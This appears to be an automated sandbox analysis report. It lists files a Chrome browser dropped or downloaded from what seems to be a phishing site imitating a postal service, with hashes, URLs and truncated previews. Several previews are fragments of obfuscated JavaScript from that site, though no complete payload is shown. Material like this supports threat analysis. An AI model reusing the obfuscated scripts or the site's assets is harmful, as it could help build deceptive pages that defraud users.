          Preview:wOFF........................................FFTM............].F~GDEF........... ....GPOS....... ... l.t.GSUB............H...OS/2......._...`.6..cmap......."...~.*..cvt ...4...D...D...Jfpgm...x.......e../.gasp...,............glyf...4......Z.h9K.head.......3...6.|.Phhea...D...!...$...}hmtx...h...9.....R>.loca......3...dw..maxp....... ... ....name............%8@Qpost...........p..$Kprep...........|.`.,.........o1.....51.........x.c`d``..b...`b..7.I.0.....................latn................x.]RMk.Q.=oN.4..@....qQ.(.*d..R.L.)]...L.e&F.~jm......~.U.M.K....R. ""...Bz..(.s..~.;.....|.rK~....;..H_v.@......6..FDTQ.../b...J.w..q\r+W].V.=tC.Wr}.=.|.F./.,x....wL.V...vA...6s.._..O.a..].F/2.....F1...<....?..-...7.>l.J...JI..B|.w|.m.H<.A|.>..U..Hp....4g8...9..<....|.G|.g|....@.....x....'~.7...y.....5a5.?..sE.+..i..\.:7..W|.7...Z\. )J.:.[..d.....M]K..=.G.....E\....$N.x.H....O..P...g.......9.y[f..a.p..$.aU0G_0k&....`..x.c`f9.8.....u..1...<.f....................{...h.... f0
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):140991
          Entropy (8bit):5.264901399717059
          Encrypted:false
          SSDEEP:1536:M9vlesNeZ3jR4o2RQ/hmXz4fwKYhOIAMiUqI8ix+vQm1dqNYQyI:M9aJmvKgiUB8ixnyI
          MD5:1D0C748A53E59829E7489BC32E1BF6EA
          SHA1:245BA9E40E10D5113B0BDE991134D26321FFA259
          SHA-256:65A5CB546ABBAB311927A21D335453FAA75C1D5F35E1F058E9934166741C6B95
          SHA-512:F3903CE2E309DACBA41CC8A904C59D5F04D8204503703FC77DBAF47F17954B5B328D0A28A9028ED209C203A7F04037F1382F768B018BE93857CAC00DA0ED2972
          Malicious:false
          Reputation:low
          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{2760:function(e,n,t){var r=t(2466),l=t(1062);function a(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var o=new Set,u={};function i(e,n){s(e,n),s(e+"Capture",n)}function s(e,n){for(u[e]=n,e=0;e<n.length;e++)o.add(n[e])}var c=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),f=Object.prototype.hasOwnProperty,d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (35443), with no line terminators
          Category:downloaded
          Size (bytes):35443
          Entropy (8bit):5.338743939035259
          Encrypted:false
          SSDEEP:768:8qiDiLzUsyD9YgG+UmAn2O1pRv42f9lUA7h2+JzQCjSpaZ/tgaTkU0ZAm/X1qnyw:8qOu42kEjzrpNX
          MD5:BC5635E1DA3D2182E2FDC5D1FAAE7853
          SHA1:40762193C4C05DAFAF5DD5E6DCE57608638FB847
          SHA-256:0563B1A4C7810B2DA5B4D1762D4C3281B62C0B082D4EBB6ACECD2CF88CB9BB14
          SHA-512:69C23223AAEE6A3C83133FA3C63C9A7AC361C8FDF0AF89BADF15A2D9CAFD132C0E0A42A77BD950B4539357F56082F5764897A849B9039C6F58DA7C82D9F6B938
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/c16a2af0JxKnW.js
          Preview:var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e885(0x265))/0x4)+-parseInt(_0x13e885(0x2aa))/0x5+-parseInt(_0x13e885(0x238))/0x6+-parseInt(_0x13e885(0x1cd))/0x7*(-parseInt(_0x13e885(0x263))/0x8)+-parseInt(_0x13e885(0x26f))/0x9+parseInt(_0x13e885(0x250))/0xa*(parseInt(_0x13e885(0x2ea))/0xb);if(_0x4cc568===_0x29dadb)break;else _0x13bea8['push'](_0x13bea8['shift']());}catch(_0x334a50){_0x13bea8['push'](_0x13bea8['shift']());}}}(a23_0x1a58,0x89c68));import{l as a23_0x492e05,_ as a23_0x185bee}from'./index-f5457718.js';import{r as a23_0x5e74b1}from'./09bf01f8JxKnW.js';import{m as a23_0x5e89b9}from'./ec21517bJxKnW.js';var E=function(_0x3be998,_0x2f67eb){var _0x5590cd=a23_0x1b94;return E=Object['setPrototy'+_0x5590cd(0x2d2)]||{'__proto__':[]}instanceof Array&&function(_0x773e98,_0x1801a7){var _0x3
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):107769
          Entropy (8bit):5.260222975099075
          Encrypted:false
          SSDEEP:1536:QEwre8DaBX8SWbVqLgZ/zxFTA89cdUi7xp5AM4//6pSC:QEO2BX8zzzeUi7x/A9wSC
          MD5:610DA2CE6C9014742E009DBB54D06628
          SHA1:2C1F903E8D6F628C54ABF209C8B4A27C848BF6A0
          SHA-256:66724B029326372C20E74845946256FED8D27A064EB5CCE3B8DA31ACFD0FA028
          SHA-512:D940574C28CC677CEA0DEEF46518C5F15107D3CBE099537601251ACCB3DAA63FE9634D8E8B5AA584F4D690189AD2B27BE8AC950325E8DE241A91850B6B3221E1
          Malicious:false
          Reputation:low
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{3735:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.then((function(r){return t.resolve(e()).then((function(){return r}))}),(function(r){return t.resolve(e()).then((function(){throw r}))}))})},8565:function(e){var t=function(e){"use strict";var t,r=Object.proto
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):27613
          Entropy (8bit):7.9067114058135255
          Encrypted:false
          SSDEEP:384:mP841dvgbsFJpwSBB0mFot1XFEUmf0Hl+009q+v+k60IOfsewcKQTaY1:mU41OQFJpZfot1+Umf08j+ROkeEK1
          MD5:42783A8A7A54514AC07F633D0828C7A2
          SHA1:2E6C33B957D0425C21EDE292563336688557BCC2
          SHA-256:5EC2E2250A6985E5E16C04978FAD8783F0B58D4DC73D9E19E70A7B59CE8CFD77
          SHA-512:8DC87B91FAE087E7716EE6E4685A6507AA66802E9B1CFE1874A20D0C5537F9B28D6DEE84572EF5A3592EA0E7B8C93A3E122445C15ABF593481D36C94587C1CEA
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/48.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..kjIDATx...Mv.K.p..y.....5.[.)...G`<......x..#0...#pi.F.e..F.\...A*.......K6...*.........9....8-.B......8....@...........@............$...........$......8....$......8....@...........@............$...........$......8....$......8....@......8....@............$...........$......8....$......8....@......8....@...........@............$......8....$......8....@......8....@...........@............$......C......8....@...........@............$...........$......8....$......8....@...........@............$...........$......8....$......8....@...r../...........5.....8......z|...c.(k.yMO...n.5.`[......w....-..H..@uA...`..S....p]G.~.....F..[.5...D."..T.'V..us....wK... q...M.J.h.......,..x...H^..:.....I.m....J...[..2.>j..?..w.>&... q.....O.>..T_'..!....E[......J.EL...3.ysY.5oe.6"q.X.>b...........$..NA.n...D`l.M~.+g.6.&B.%.(YI...H.f.5g;..~a...~........ q..E........{.z\.".yB.v.G.j...2"...5..h.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (17553), with no line terminators
          Category:downloaded
          Size (bytes):17555
          Entropy (8bit):5.212307168759353
          Encrypted:false
          SSDEEP:192:BfZT1WkfJ4FOFDULEKALK2bq1pnv313SY7GhePO1yd816+hePXZ0dLXvLMOW4RxE:BGkf8eDeTEK2anv30uSZ6jeNMJl5ll
          MD5:932AB86A485C5448691469792A137121
          SHA1:3BA7F519F870F7664779F3765959D07971F6165D
          SHA-256:8FB9EEF58678EAE781227CFAD2EAD48E90FDD5917AC83BC097225BA243B63F3B
          SHA-512:D5B0B3B9566BBE7F51B1629C145E62DE854F440C19E9D47FC076D6F7A96BE8AC032F2BA935FCC6CB5C2FE2E08EE11750DBD2918C6E19939EEC4707DFAFFF2A42
          Malicious:false
          Reputation:low
          URL:https://pttem.alo-tech.com/chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t
          Preview:var acjsFullsize = false;var MOBILE_SCREEN,focus_interval=0,acjs_near_left=!1;function AloChatDraw(t){var e,a,o;AloChat.alochat_page_title=document.title,AloChat.muteChat=!1,0<document.getElementsByClassName("alotech-chat-widget").length?console.log("chat widget already exists"):(e=document.createElement("div"),a=document.createElement("div"),AloChat.fullsize?(e.style.margin="0px",e.style.zIndex="9999999",e.style.backgroundColor="white",t.custom_properties&&t.custom_properties.master_page&&(".alotech-chat-widget"in(masterPageCss=t.custom_properties.master_page)&&masterPageCss[".alotech-chat-widget"].fullsize_status&&masterPageCss[".alotech-chat-widget"].fullsize_status.height&&(e.style.height=masterPageCss[".alotech-chat-widget"].fullsize_status.height),".alotech-chat-body"in masterPageCss)&&masterPageCss[".alotech-chat-body"].fullsize_status&&masterPageCss[".alotech-chat-body"].fullsize_status.height&&(a.style.height=masterPageCss[".alotech-chat-body"].fullsize_status.height)):(e.styl
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (4650), with no line terminators
          Category:dropped
          Size (bytes):4708
          Entropy (8bit):5.24982094326148
          Encrypted:false
          SSDEEP:96:LhLALv2dQ13a19GeEc2mvDjHqiqV8SYn1u7+eNEgyJY47186ee7f1lV:xz5Ec1vfqiqVg1u7+eyPY47186ee7f1D
          MD5:0DA2A6E8828A9D4461A27CC813A21CD1
          SHA1:32727963FEC3E91E3951E0551ABA8AC7F45FC89D
          SHA-256:8A87A08F2C1C9AE855AACA4BD6F26B5DE44F28EA9810039F93333CC8E59FD166
          SHA-512:4F6E559C68F275E9C2F2C3C8D04392049C75856279387E74EEF2BD791DE653A81231C8B08BF86C712C905CD2C603A5298B092BCA2F7A29092AD8CD1E1F35FDA1
          Malicious:false
          Reputation:low
          Preview:const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x472517(0x12a))/0x4*(parseInt(_0x472517(0x145))/0x5)+parseInt(_0x472517(0x129))/0x6*(parseInt(_0x472517(0x144))/0x7)+-parseInt(_0x472517(0x12e))/0x8*(parseInt(_0x472517(0x141))/0x9)+parseInt(_0x472517(0x132))/0xa;if(_0x10a64b===_0x4c3503)break;else _0x18f288['push'](_0x18f288['shift']());}catch(_0x2102de){_0x18f288['push'](_0x18f288['shift']());}}}(a16_0x4681,0x6ebf6));const a16_0xaa59f7=(function(){let _0x410bd1=!![];return function(_0x3e5c07,_0x31cc45){const _0x5c21e7=_0x410bd1?function(){const _0x3aa6a6=a16_0xb309;if(_0x31cc45){const _0x21f428=_0x31cc45[_0x3aa6a6(0x124)](_0x3e5c07,arguments);return _0x31cc45=null,_0x21f428;}}:function(){};return _0x410bd1=![],_0x5c21e7;};}()),a16_0x8c9795=a16_0xaa59f7(this,function(){const _0x3aa272=a16_0x
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (17840), with no line terminators
          Category:downloaded
          Size (bytes):17840
          Entropy (8bit):5.05052143987542
          Encrypted:false
          SSDEEP:192:w58y3F4D2arxp2CygGCL1dylCL1J1i5iONdb9dJNdsoyVjU3kagh+hsr/2g1w:wV3F4K2xwbzWVjYXgchsDE
          MD5:D0005C8D31546500BA92FED4EBA66850
          SHA1:51290A4147664F5968BC24476181E92C27DABF70
          SHA-256:925325FAAC0525494FFAA66AC114EDE355FDF6C2715B9C71D0176EA861A98294
          SHA-512:8E7F6734C2ABC891FDA41FD3A6B6C1DFADCC932F93853C19860FC4C4B32BB546EA1319E175907D15DF65305FCD0A9B3A702B408CC99BBCF56149B23F841FB4B9
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/js/linkify.html.min.js
          Preview:if(!window.ACJS){window.ACJS={};}window.ACJS.linkifyHtml=function(t){"use strict";var e={amp:"&",gt:">",lt:"<",nbsp:" ",quot:'"'},i=/^#[xX]([A-Fa-f0-9]+)$/,n=/^#([0-9]+)$/,s=/^([A-Za-z0-9]+)$/,o=function(){function t(t){this.named=t}return t.prototype.parse=function(t){if(t){var e=t.match(i);return e?String.fromCharCode(parseInt(e[1],16)):(e=t.match(n))?String.fromCharCode(parseInt(e[1],10)):(e=t.match(s))?this.named[e[1]]||"&"+e[1]+";":void 0}},t}(),a=/[\t\n\f ]/,r=/[A-Za-z]/,h=/\r\n?/g;function u(t){return a.test(t)}function p(t){return r.test(t)}var c=function(){function t(t,e,i){void 0===i&&(i="precompile"),this.delegate=t,this.entityParser=e,this.mode=i,this.state="beforeData",this.line=-1,this.column=-1,this.input="",this.index=-1,this.tagNameBuffer="",this.states={beforeData:function(){var t=this.peek();if("<"!==t||this.isIgnoredEndTag()){if("precompile"===this.mode&&"\n"===t){var e=this.tagNameBuffer.toLowerCase();"pre"!==e&&"textarea"!==e||this.consume()}this.transitionTo("dat
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (1965), with no line terminators
          Category:dropped
          Size (bytes):1965
          Entropy (8bit):5.287237545046552
          Encrypted:false
          SSDEEP:24:cP2k+LBK+qcy+SDaOrKhbM4O7IlH2VZ5RJR7RRRdilxXmxV4y5T0zxHI2MRRtMav:99Zqh+GOOMlH2Si35A1HpMdtZAlA
          MD5:D66FEBB5B4397732135B71831C138AFD
          SHA1:B2A462BAD03E25C4109424B80B8C3F1CC7055558
          SHA-256:E24C314BD212C166353D089356F9296351B7D31D88E7D386197443A970BA6AB5
          SHA-512:8C933EBA937FD28674F709FE7E2B342877D37F7B1A269EC09023EB98891D6E13402C0F14793DEA90C2CF1B510A6EFFCA317BBAC43EAC30A2336327EFB6D2448F
          Malicious:false
          Reputation:low
          Preview:function a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','constructo'];a0_0x1726=function(){return _0x590fb6;};return a0_0x1726();}(function(_0x3fc008,_0x3d9ca0){const _0x55189d=a0_0x1055,_0x3a6928=_0x3fc008();while(!![]){try{const _0x29b996=parseInt(_0x55189d(0xcd))/0x1+-parseInt(_0x55189d(0xc4))/0x2+parseInt(_0x55189d(0xd1))/0x3+parseInt(_0x55189d(0xd3))/0x4*(parseInt(_0x55189d(0xce))/0x5)+-parseInt(_0x55189d(0xc5))/0x6+-parseInt(_0x55189d(0xc3))/0x7+-parseInt(_0x55189d(0xcc))/0x8;if(_0x29b996===_0x3d9ca0)break;else _0x3a6928['push'](_0x3a6928['shift']());}catch(_0x571e3b){_0x3a6928['push'](_0x3a6928['shift']());}}}(a0_0x1726,0x61119));function a0_0x1055(_0xf64470,_0x4b0865){const _0x32fcc2=a0_0x1726();return a0_0x1055=function(_0xb13448,_0x57136d){_0xb13448=_0xb13448-0xc2;let _0x172600=_0x32fcc
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with no line terminators
          Category:downloaded
          Size (bytes):16
          Entropy (8bit):3.875
          Encrypted:false
          SSDEEP:3:H+uZYn:euZYn
          MD5:46DF3E5E2D15256CA16616EBFDA5427F
          SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
          SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
          SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
          Malicious:false
          Reputation:low
          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnRMF4PivTGbBIFDZFhlU4=?alt=proto
          Preview:CgkKBw2RYZVOGgA=
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:SVG Scalable Vector Graphics image
          Category:dropped
          Size (bytes):2682
          Entropy (8bit):4.4904670747715585
          Encrypted:false
          SSDEEP:24:t4o1WOIsLcS4VCFTDOLLTuZQ161xxM1tltkOJXKu5PfPMXIiz6NcS4VCFTDOLLzx:pbLc3o2LTu+2F+amc3o2LU+GGBWGVH6I
          MD5:A9DDCD4D865D3F2E85BDBB9BF38F73C6
          SHA1:435CC4E8C5417268BECF4DE5021EDA6A558B6B11
          SHA-256:38D713D08730A4398FB0AA408912957A0C19E1FFC8A4DA071547DBFA00C5E485
          SHA-512:A3540ACC364E53A2E428F44BDD67D72293184FF5555692D0880C4C04EEB443D1CE41E2A7A9327D92DAA2BE93D0AE3BCA14DB571291DA3AE2269AA693EAD44A7E
          Malicious:false
          Reputation:low
          Preview:<svg xmlns="http://www.w3.org/2000/svg" height="512pt" version="1.1" viewBox="-90 0 512 512.00001" width="512pt">.<g id="surface1">.<path d="M 331.964844 275.082031 C 331.964844 266.652344 325.128906 259.816406 316.695312 259.816406 C 308.261719 259.816406 301.425781 266.652344 301.425781 275.082031 C 301.425781 349.769531 240.667969 410.527344 165.980469 410.527344 C 91.296875 410.527344 30.539062 349.769531 30.539062 275.082031 C 30.539062 266.652344 23.703125 259.816406 15.269531 259.816406 C 6.835938 259.816406 0 266.652344 0 275.082031 C 0 361.460938 66.320312 432.621094 150.714844 440.355469 L 150.714844 481.460938 L 94.046875 481.460938 C 85.613281 481.460938 78.777344 488.296875 78.777344 496.730469 C 78.777344 505.164062 85.613281 512 94.046875 512 L 237.917969 512 C 246.347656 512 253.1875 505.164062 253.1875 496.730469 C 253.1875 488.296875 246.347656 481.460938 237.917969 481.460938 L 181.25 481.460938 L 181.25 440.355469 C 265.644531 432.625 331.964844 361.460938 331.96484
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (1892), with no line terminators
          Category:dropped
          Size (bytes):1892
          Entropy (8bit):5.3199265720505045
          Encrypted:false
          SSDEEP:48:9MxFGgXen1yVqPNzTOv+Pgdxj2zRxpUky6fRK2:9MPGgYyV8NrgdV29vUkVfRK2
          MD5:BD7525226CFF3D63880AB3E3783107C4
          SHA1:B69F85592A127F736AD8B04F0DBB378295463C85
          SHA-256:81F05B60B2139D0F055A533BDEED2E2BC3E6142A9E779A0C644455F1BBF3F9C1
          SHA-512:9D33EACA3352F03C946DF20AEBA8ECB5430A0881A0150748E3C217400CD965FEE7F379D0D21FEA110BCE7EC43BE8BBD0230A2239EA453175C8900752B1B6FBA9
          Malicious:false
          Reputation:low
          Preview:function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(){const _0xb022b5=['1002222jJEtDH','toString','254AqdTdL','__vccOpts','5ToDzfk','1085710vVxwgb','528906UwedBM','search','constructo','54xBZeip','10320728oLohLb','353TqOCxG','(((.+)+)+)','2031164WFthFE','8CvfsLG','226828xuWwpQ'];a24_0x324b=function(){return _0xb022b5;};return a24_0x324b();}(function(_0x2907ff,_0x1577d4){const _0x4680c9=a24_0x5346,_0x3fc7cd=_0x2907ff();while(!![]){try{const _0x4b2c9c=parseInt(_0x4680c9(0x6b))/0x1*(-parseInt(_0x4680c9(0x72))/0x2)+parseInt(_0x4680c9(0x76))/0x3+-parseInt(_0x4680c9(0x6d))/0x4*(parseInt(_0x4680c9(0x74))/0x5)+parseInt(_0x4680c9(0x69))/0x6*(-parseInt(_0x4680c9(0x6f))/0x7)+parseInt(_0x4680c9(0x6e))/0x8*(parseInt(_0x4680c9(0x70))/0x9)+-parseInt(_0x4680c9(0x75))/0xa+parseInt(_0x4680c9(0x6a))/0xb;if(_0x
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (301)
          Category:downloaded
          Size (bytes):27231
          Entropy (8bit):4.969538355156986
          Encrypted:false
          SSDEEP:384:V4CBhTJwxFGFepFFVofu2NF2advHrGlmBpa/pe:zBEFGFepFvoGOkadvHz3Ke
          MD5:2D53B06F292DCB355B5E1A39EC065054
          SHA1:57CA25A18CBDEDF36973B712BC81F9E3F883A371
          SHA-256:22A22E76F4DE930E54DD33AF00C71B68828847409E5E79787DF5224DD9776C6F
          SHA-512:83C4394957069679994F7C04B1643AF895733E3469B539F9D202934FA5F808D31CB42EDF92029F23E849DEDD45EC50BB90D0009C3FA4450E8E50AB9C832313DA
          Malicious:false
          Reputation:low
          URL:https://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css
          Preview:/*!. * Font Awesome 3.2.1. * the iconic font designed for Bootstrap. * ------------------------------------------------------------------------------. * The full suite of pictographic icons, examples, and documentation can be. * found at http://fontawesome.io. Stay up to date on Twitter at. * http://twitter.com/fontawesome.. *. * License. * ------------------------------------------------------------------------------. * - The Font Awesome font is licensed under SIL OFL 1.1 -. * http://scripts.sil.org/OFL. * - Font Awesome CSS, LESS, and SASS files are licensed under MIT License -. * http://opensource.org/licenses/mit-license.html. * - Font Awesome documentation licensed under CC BY 3.0 -. * http://creativecommons.org/licenses/by/3.0/. * - Attribution is no longer required in Font Awesome 3.0, but much appreciated:. * "Font Awesome by Dave Gandy - http://fontawesome.io". *. * Author - Dave Gandy. * -------------------------------------------------------------
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with no line terminators
          Category:downloaded
          Size (bytes):224
          Entropy (8bit):5.167357475223866
          Encrypted:false
          SSDEEP:6:GnuZZtYsQijHpKk6td3bNNQOY6l70lkYOY:GnuZzYvijH8td3bxllnYOY
          MD5:400E3C3B9D7F4839A95D93D351D109C1
          SHA1:E21413CC081DA69ED57EA5AFC0960A94715E839E
          SHA-256:C40304D98BEA1668EF7C5F0751D41916E149A4431162A011252D16F847879E65
          SHA-512:1F84E04343C3090C2C1B7BA4A4C907B4B71390B7BC1F582D4818503F99A86D45578B73474ED95D3CB6A6156AE28147C3B5D70D35CF325DC6A3933F53DA49AC5D
          Malicious:false
          Reputation:low
          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISOgl8tXgV735fcBIFDZFhlU4SBQ2UVPrPEgUNg6hbPRIFDTQmxlsSBQ3qHyP2EgUNdGU6HhIFDXBgGagSEAnRMF4PivTGbBIFDZFhlU4SHglqRls8VkKTMRIFDZRU-s8SBQ2DqFs9EgUNNCbGWxIQCZXkj2o9pOObEgUN6h8j9hIXCQLIr2gxIw_3EgUNdGU6HhIFDXBgGag=?alt=proto
          Preview:CksKBw2RYZVOGgAKCw2UVPrPGgQIBxgBCgsNg6hbPRoECAkYAQoLDTQmxlsaBAgNGAEKBw3qHyP2GgAKBw10ZToeGgAKBw1wYBmoGgAKCQoHDZFhlU4aAAouCgsNlFT6zxoECAcYAQoSDYOoWz0aBAgJGAEaBQigARgCCgsNNCbGWxoECA0YAQoJCgcN6h8j9hoAChIKBw10ZToeGgAKBw1wYBmoGgA=
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):11236
          Entropy (8bit):7.810773514354199
          Encrypted:false
          SSDEEP:192:kMT1s9HGoPMx5pkNj2lCMRzf9vtAfvdaVyQkVdabDaV2QqgOr/NE6kMy52E+lgBK:r1OHw3pm2lCacvdaDk6CcWOYMy5D+GBK
          MD5:B2CB0F3916850DCD4056B9D6336FD78A
          SHA1:76F040631FE153456638BC65E459A184DE09FE53
          SHA-256:C947614A8D15810CF1B6768C16458C002E3D65640BF2B415BC1E23DA049CBEFD
          SHA-512:A9FA0D82D0E753F3BD767568B3D6EF135F41C9D919C5361F5CA69BE157B76E7CE9473355397CD0E92157E7A338D06B35D08AF4BF21B045B0BAEDB2D22A33CD5B
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..+qIDATx....u...`T.;.;.."..'.#.j.C..X....J.....J...IO-GPt....-m\.Tz.........!. ...8....^...[~.....8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@.....8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@...........[7..}..?b{Zo.-..[.].?|...#)......-.....|..E..K.N.....m...v%.]...P'.......z.T.k.J..@w.[....8.8...4C.P..C....L........_.Y.......3.....`/...1...=.xQ;7.@W...o[....m....fN...].o.lz~@.m.U~.saN...].o1`aZo....>sgu..p(.8..r..iBf........6Q+'..
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
          Category:dropped
          Size (bytes):504521
          Entropy (8bit):5.245686837916366
          Encrypted:false
          SSDEEP:12288:NtjBw2fR0+JDC9yvd8l8hiuyaqQeuKiv7fD6oAj0BBlNAroY4DPindxfy3GOpBJ/:feSDypuKiv7fD6oAj0BBlNA2exfy1Jfn
          MD5:1E8E7D0C756EE63FCBCED0E685E20191
          SHA1:1E7AEC9DE709ADDED1E8D31B0D449C3D05B68810
